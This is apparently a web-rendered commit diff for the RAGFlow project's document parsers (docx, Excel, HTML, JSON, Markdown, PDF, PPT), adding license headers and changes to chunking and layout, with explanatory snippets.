# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from docx import Document
import re
import pandas as pd
@ -101,19 +113,24 @@ class RAGFlowDocxParser:
def __call__(self, fnm, from_page=0, to_page=100000):
self.doc = Document(fnm) if isinstance(
fnm, str) else Document(BytesIO(fnm))
pn = 0
secs = []
pn = 0 # parsed page
secs = [] # parsed contents
for p in self.doc.paragraphs:
if pn > to_page:
break
if from_page <= pn < to_page and p.text.strip():
secs.append((p.text, p.style.name))
runs_within_single_paragraph = [] # save runs within the range of pages
for run in p.runs:
if pn > to_page:
break
if from_page <= pn < to_page and p.text.strip():
runs_within_single_paragraph.append(run.text) # append run.text first
# wrap page break checker into a static method
if 'lastRenderedPageBreak' in run._element.xml:
pn += 1
continue
if 'w:br' in run._element.xml and 'type="page"' in run._element.xml:
pn += 1
secs.append(("".join(runs_within_single_paragraph), p.style.name)) # then concat run.text as part of the paragraph
tbls = [self.__extract_table_content(tb) for tb in self.doc.tables]
return secs, tbls
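The page counter in the hunk above advances on two markers found in a run's XML: a `lastRenderedPageBreak` element, or a `w:br` element with `type="page"`. The counting rule can be sketched on plain strings, without python-docx. `count_page_breaks` and the sample fragments are illustrative and not taken from the repository.

```python
def count_page_breaks(run_xml_fragments):
    """Count page boundaries using the same two checks as the parser loop."""
    pages = 0
    for xml in run_xml_fragments:
        if "lastRenderedPageBreak" in xml:
            pages += 1
            continue  # a run is counted at most once
        if "w:br" in xml and 'type="page"' in xml:
            pages += 1
    return pages


runs = [
    '<w:r><w:t>Intro</w:t></w:r>',
    '<w:r><w:lastRenderedPageBreak/><w:t>Second page</w:t></w:r>',
    '<w:r><w:br w:type="page"/></w:r>',
    '<w:r><w:br/><w:t>soft line break</w:t></w:r>',
]
print(count_page_breaks(runs))
```

A plain `w:br` without `type="page"` is a line break, so it does not advance the counter.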

View File

@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from openpyxl import load_workbook
import sys
from io import BytesIO
@ -7,30 +19,39 @@ from rag.nlp import find_codec
class RAGFlowExcelParser:
def html(self, fnm):
def html(self, fnm, chunk_rows=256):
if isinstance(fnm, str):
wb = load_workbook(fnm)
else:
wb = load_workbook(BytesIO(fnm))
tb = ""
tb_chunks = []
for sheetname in wb.sheetnames:
ws = wb[sheetname]
rows = list(ws.rows)
if not rows:continue
tb += f"<table><caption>{sheetname}</caption><tr>"
if not rows: continue
tb_rows_0 = "<tr>"
for t in list(rows[0]):
tb += f"<th>{t.value}</th>"
tb += "</tr>"
for r in list(rows[1:]):
tb += "<tr>"
for i, c in enumerate(r):
if c.value is None:
tb += "<td></td>"
else:
tb += f"<td>{c.value}</td>"
tb += "</tr>"
tb += "</table>\n"
return tb
tb_rows_0 += f"<th>{t.value}</th>"
tb_rows_0 += "</tr>"
for chunk_i in range((len(rows) - 1) // chunk_rows + 1):
tb = ""
tb += f"<table><caption>{sheetname}</caption>"
tb += tb_rows_0
for r in list(rows[1 + chunk_i * chunk_rows:1 + (chunk_i + 1) * chunk_rows]):
tb += "<tr>"
for i, c in enumerate(r):
if c.value is None:
tb += "<td></td>"
else:
tb += f"<td>{c.value}</td>"
tb += "</tr>"
tb += "</table>\n"
tb_chunks.append(tb)
return tb_chunks
def __call__(self, fnm):
if isinstance(fnm, str):
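The chunk arithmetic in the new `html` method can be checked in isolation. The sketch below reproduces only the index computation; `data_rows_per_chunk` is a hypothetical helper, and `total_rows` includes the header row, mirroring `len(rows)`. As written, the formula appears to yield one extra header-only table when the number of data rows is an exact multiple of `chunk_rows`.

```python
def data_rows_per_chunk(total_rows: int, chunk_rows: int = 256):
    """Return how many data rows each emitted table would contain."""
    n_chunks = (total_rows - 1) // chunk_rows + 1
    sizes = []
    for chunk_i in range(n_chunks):
        start = 1 + chunk_i * chunk_rows
        stop = 1 + (chunk_i + 1) * chunk_rows
        # Slicing a range follows the same clamping rules as slicing the row list.
        sizes.append(len(range(total_rows)[start:stop]))
    return sizes


print(data_rows_per_chunk(601))    # header + 600 data rows
print(data_rows_per_chunk(513))    # header + 512 data rows
print(data_rows_per_chunk(10, 4))  # header + 9 data rows, small chunks
```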

View File

@ -0,0 +1,39 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from rag.nlp import find_codec
import readability
import html_text
import chardet


def get_encoding(file):
    with open(file, 'rb') as f:
        tmp = chardet.detect(f.read())
        return tmp['encoding']


class RAGFlowHtmlParser:
    def __call__(self, fnm, binary=None):
        txt = ""
        if binary:
            encoding = find_codec(binary)
            txt = binary.decode(encoding, errors="ignore")
        else:
            with open(fnm, "r", encoding=get_encoding(fnm)) as f:
                txt = f.read()

        html_doc = readability.Document(txt)
        title = html_doc.title()
        content = html_text.extract_text(html_doc.summary(html_partial=True))
        txt = f'{title}\n{content}'
        sections = txt.split("\n")
        return sections

View File

@ -0,0 +1,116 @@
# -*- coding: utf-8 -*-
# The following documents are mainly referenced, and only adaptation modifications have been made
# from https://github.com/langchain-ai/langchain/blob/master/libs/text-splitters/langchain_text_splitters/json.py
import json
from typing import Any, Dict, List, Optional
from rag.nlp import find_codec


class RAGFlowJsonParser:
    def __init__(
        self, max_chunk_size: int = 2000, min_chunk_size: Optional[int] = None
    ):
        super().__init__()
        self.max_chunk_size = max_chunk_size * 2
        self.min_chunk_size = (
            min_chunk_size
            if min_chunk_size is not None
            else max(max_chunk_size - 200, 50)
        )

    def __call__(self, binary):
        encoding = find_codec(binary)
        txt = binary.decode(encoding, errors="ignore")
        json_data = json.loads(txt)
        chunks = self.split_json(json_data, True)
        sections = [json.dumps(l, ensure_ascii=False) for l in chunks if l]
        return sections

    @staticmethod
    def _json_size(data: Dict) -> int:
        """Calculate the size of the serialized JSON object."""
        return len(json.dumps(data, ensure_ascii=False))

    @staticmethod
    def _set_nested_dict(d: Dict, path: List[str], value: Any) -> None:
        """Set a value in a nested dictionary based on the given path."""
        for key in path[:-1]:
            d = d.setdefault(key, {})
        d[path[-1]] = value

    def _list_to_dict_preprocessing(self, data: Any) -> Any:
        if isinstance(data, dict):
            # Process each key-value pair in the dictionary
            return {k: self._list_to_dict_preprocessing(v) for k, v in data.items()}
        elif isinstance(data, list):
            # Convert the list to a dictionary with index-based keys
            return {
                str(i): self._list_to_dict_preprocessing(item)
                for i, item in enumerate(data)
            }
        else:
            # Base case: the item is neither a dict nor a list, so return it unchanged
            return data

    def _json_split(
        self,
        data: Dict[str, Any],
        current_path: Optional[List[str]] = None,
        chunks: Optional[List[Dict]] = None,
    ) -> List[Dict]:
        """
        Split json into maximum size dictionaries while preserving structure.
        """
        current_path = current_path or []
        chunks = chunks or [{}]
        if isinstance(data, dict):
            for key, value in data.items():
                new_path = current_path + [key]
                chunk_size = self._json_size(chunks[-1])
                size = self._json_size({key: value})
                remaining = self.max_chunk_size - chunk_size

                if size < remaining:
                    # Add item to current chunk
                    self._set_nested_dict(chunks[-1], new_path, value)
                else:
                    if chunk_size >= self.min_chunk_size:
                        # Chunk is big enough, start a new chunk
                        chunks.append({})

                    # Iterate
                    self._json_split(value, new_path, chunks)
        else:
            # handle single item
            self._set_nested_dict(chunks[-1], current_path, data)
        return chunks

    def split_json(
        self,
        json_data: Dict[str, Any],
        convert_lists: bool = False,
    ) -> List[Dict]:
        """Splits JSON into a list of JSON chunks"""

        if convert_lists:
            chunks = self._json_split(self._list_to_dict_preprocessing(json_data))
        else:
            chunks = self._json_split(json_data)

        # Remove the last chunk if it's empty
        if not chunks[-1]:
            chunks.pop()
        return chunks

    def split_text(
        self,
        json_data: Dict[str, Any],
        convert_lists: bool = False,
        ensure_ascii: bool = True,
    ) -> List[str]:
        """Splits JSON into a list of JSON formatted strings"""

        chunks = self.split_json(json_data=json_data, convert_lists=convert_lists)

        # Convert to string
        return [json.dumps(chunk, ensure_ascii=ensure_ascii) for chunk in chunks]
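Two helpers carry most of the structure-preserving behaviour of the splitter: lists are first rewritten as dicts keyed by index, and values are then written back into a chunk along their key path. The standalone sketch below mirrors `_list_to_dict_preprocessing` and `_set_nested_dict` as free functions; the names `list_to_dict` and `set_nested` are chosen here for illustration. With the default `max_chunk_size=2000`, the constructor above stores an effective maximum of 4000 characters and a minimum of `max(2000 - 200, 50) = 1800`.

```python
from typing import Any, Dict, List


def list_to_dict(data: Any) -> Any:
    """Recursively replace lists with dicts keyed by the element index."""
    if isinstance(data, dict):
        return {k: list_to_dict(v) for k, v in data.items()}
    if isinstance(data, list):
        return {str(i): list_to_dict(item) for i, item in enumerate(data)}
    return data


def set_nested(d: Dict, path: List[str], value: Any) -> None:
    """Create intermediate dicts along `path` and set the final key."""
    for key in path[:-1]:
        d = d.setdefault(key, {})
    d[path[-1]] = value


doc = {"users": [{"name": "a"}, {"name": "b"}]}
print(list_to_dict(doc))

chunk: Dict = {}
set_nested(chunk, ["users", "1", "name"], "b")
print(chunk)
```

Because every chunk is rebuilt from full key paths, each one remains a valid JSON object that records where its values sat in the original document.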

View File

@ -0,0 +1,44 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re


class RAGFlowMarkdownParser:
    def __init__(self, chunk_token_num=128):
        self.chunk_token_num = int(chunk_token_num)

    def extract_tables_and_remainder(self, markdown_text):
        # Standard Markdown table
        table_pattern = re.compile(
            r'''
            (?:\n|^)
            (?:\|.*?\|.*?\|.*?\n)
            (?:\|(?:\s*[:-]+[-| :]*\s*)\|.*?\n)
            (?:\|.*?\|.*?\|.*?\n)+
            ''', re.VERBOSE)
        tables = table_pattern.findall(markdown_text)
        remainder = table_pattern.sub('', markdown_text)

        # Borderless Markdown table
        no_border_table_pattern = re.compile(
            r'''
            (?:\n|^)
            (?:\S.*?\|.*?\n)
            (?:(?:\s*[:-]+[-| :]*\s*).*?\n)
            (?:\S.*?\|.*?\n)+
            ''', re.VERBOSE)
        no_border_tables = no_border_table_pattern.findall(remainder)
        tables.extend(no_border_tables)
        remainder = no_border_table_pattern.sub('', remainder)

        return remainder, tables
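The first pass of `extract_tables_and_remainder` can be tried on a small input. The sketch below copies only the bordered-table pattern; `split_bordered_tables` is a hypothetical name and the borderless pass is deliberately left out. Each match also consumes the newline before the table, so the text on either side appears to be joined in the remainder.

```python
import re

# Bordered-table pattern copied from extract_tables_and_remainder above.
TABLE_PATTERN = re.compile(
    r'''
    (?:\n|^)
    (?:\|.*?\|.*?\|.*?\n)
    (?:\|(?:\s*[:-]+[-| :]*\s*)\|.*?\n)
    (?:\|.*?\|.*?\|.*?\n)+
    ''', re.VERBOSE)


def split_bordered_tables(markdown_text: str):
    """Return (remainder, tables) using only the bordered-table pass."""
    tables = TABLE_PATTERN.findall(markdown_text)
    remainder = TABLE_PATTERN.sub('', markdown_text)
    return remainder, tables


sample = "Intro\n| a | b |\n|---|---|\n| 1 | 2 |\nOutro\n"
remainder, tables = split_bordered_tables(sample)
print(len(tables))
print(repr(remainder))
```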

View File

@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import random
@ -11,7 +23,7 @@ import logging
from PIL import Image, ImageDraw
import numpy as np
from timeit import default_timer as timer
from PyPDF2 import PdfReader as pdf2_read
from pypdf import PdfReader as pdf2_read
from api.utils.file_utils import get_project_base_directory
from deepdoc.vision import OCR, Recognizer, LayoutRecognizer, TableStructureRecognizer
@ -273,10 +285,10 @@ class RAGFlowPdfParser:
"page_number": pagenum} for b, t in bxs if b[0][0] <= b[1][0] and b[0][1] <= b[-1][1]],
self.mean_height[-1] / 3
)
# merge chars in the same rect
for c in Recognizer.sort_X_firstly(
chars, self.mean_width[pagenum - 1] // 4):
for c in Recognizer.sort_Y_firstly(
chars, self.mean_height[pagenum - 1] // 4):
ii = Recognizer.find_overlapped(c, bxs)
if ii is None:
self.lefted_chars.append(c)
@ -392,11 +404,11 @@ class RAGFlowPdfParser:
b["text"].strip()[-1] in ",;:'\",、‘“;:-",
len(b["text"].strip()) > 1 and b["text"].strip(
)[-2] in ",;:'\",‘“、;:",
b["text"].strip()[0] in "。;?!?”)),,、:",
b_["text"].strip() and b_["text"].strip()[0] in "。;?!?”)),,、:",
]
# features for not concating
feats = [
b.get("layoutno", 0) != b.get("layoutno", 0),
b.get("layoutno", 0) != b_.get("layoutno", 0),
b["text"].strip()[-1] in "。?!?",
self.is_english and b["text"].strip()[-1] in ".!?",
b["page_number"] == b_["page_number"] and b_["top"] -
@ -749,6 +761,7 @@ class RAGFlowPdfParser:
"layoutno", "")))
left, top, right, bott = b["x0"], b["top"], b["x1"], b["bottom"]
if right < left: right = left + 1
poss.append((pn + self.page_from, left, right, top, bott))
return self.page_images[pn] \
.crop((left * ZM, top * ZM,
@ -939,7 +952,7 @@ class RAGFlowPdfParser:
fnm, str) else pdfplumber.open(BytesIO(fnm))
self.page_images = [p.to_image(resolution=72 * zoomin).annotated for i, p in
enumerate(self.pdf.pages[page_from:page_to])]
self.page_chars = [[c for c in page.chars if self._has_color(c)] for page in
self.page_chars = [[{**c, 'top': c['top'], 'bottom': c['bottom']} for c in page.dedupe_chars().chars if self._has_color(c)] for page in
self.pdf.pages[page_from:page_to]]
self.total_page = len(self.pdf.pages)
except Exception as e:
@ -972,7 +985,6 @@ class RAGFlowPdfParser:
self.is_english = True
else:
self.is_english = False
self.is_english = False
st = timer()
for i, img in enumerate(self.page_images):
@ -1008,6 +1020,8 @@ class RAGFlowPdfParser:
self.page_cum_height = np.cumsum(self.page_cum_height)
assert len(self.page_cum_height) == len(self.page_images) + 1
if len(self.boxes) == 0 and zoomin < 9: self.__images__(fnm, zoomin * 3, page_from,
page_to, callback)
def __call__(self, fnm, need_image=True, zoomin=3, return_html=False):
self.__images__(fnm, zoomin)
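The hunk above re-runs `__images__` at three times the zoom when no text boxes were found and `zoomin < 9`. With the default `zoomin=3` from `__call__`, that allows a single retry at 9. A minimal sketch of that control flow follows; the `detect` callable is a stand-in for the OCR pass and is not part of the repository.

```python
def detect_with_zoom_retry(detect, zoomin=3, max_zoom=9):
    """Call detect(zoomin); if it finds nothing, retry at 3x zoom while zoomin < max_zoom."""
    boxes = detect(zoomin)
    if len(boxes) == 0 and zoomin < max_zoom:
        return detect_with_zoom_retry(detect, zoomin * 3, max_zoom)
    return boxes


calls = []


def fake_detect(zoom):
    # Stand-in detector: only finds text once the page is rendered at zoom 9.
    calls.append(zoom)
    return ["box"] if zoom >= 9 else []


print(detect_with_zoom_retry(fake_detect), calls)
```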

View File

@ -10,6 +10,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
from io import BytesIO
from pptx import Presentation
@ -51,7 +52,7 @@ class RAGFlowPptParser(object):
break
texts = []
for shape in sorted(
slide.shapes, key=lambda x: (x.top // 10, x.left)):
slide.shapes, key=lambda x: ((x.top if x.top is not None else 0) // 10, x.left)):
txt = self.__extract(shape)
if txt:
texts.append(txt)
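The changed sort key treats a missing `top` as 0, so shapes without a vertical position no longer raise a `TypeError` on `None // 10`. The sketch below uses a `namedtuple` in place of python-pptx shapes. The `Shape` type and sample values are illustrative only, and `left` is left unguarded, as in the diff.

```python
from collections import namedtuple

# Stand-in for a python-pptx shape; only the fields used by the sort key.
Shape = namedtuple("Shape", "name top left")


def reading_order(shapes):
    """Sort into rows of 10 units by `top`, then by `left`; a missing top counts as 0."""
    return sorted(
        shapes,
        key=lambda x: ((x.top if x.top is not None else 0) // 10, x.left),
    )


shapes = [
    Shape("body", 120, 10),
    Shape("placeholder", None, 5),
    Shape("title", 12, 10),
    Shape("logo", 15, 300),
]
print([s.name for s in reading_order(shapes)])
```

Dividing `top` by 10 groups shapes whose tops differ by only a few units into the same row, so they are ordered left to right.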

View File

@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime

View File

@ -1,3 +1,16 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re,json,os
import pandas as pd
from rag.nlp import rag_tokenizer

Some files were not shown because too many files have changed in this diff.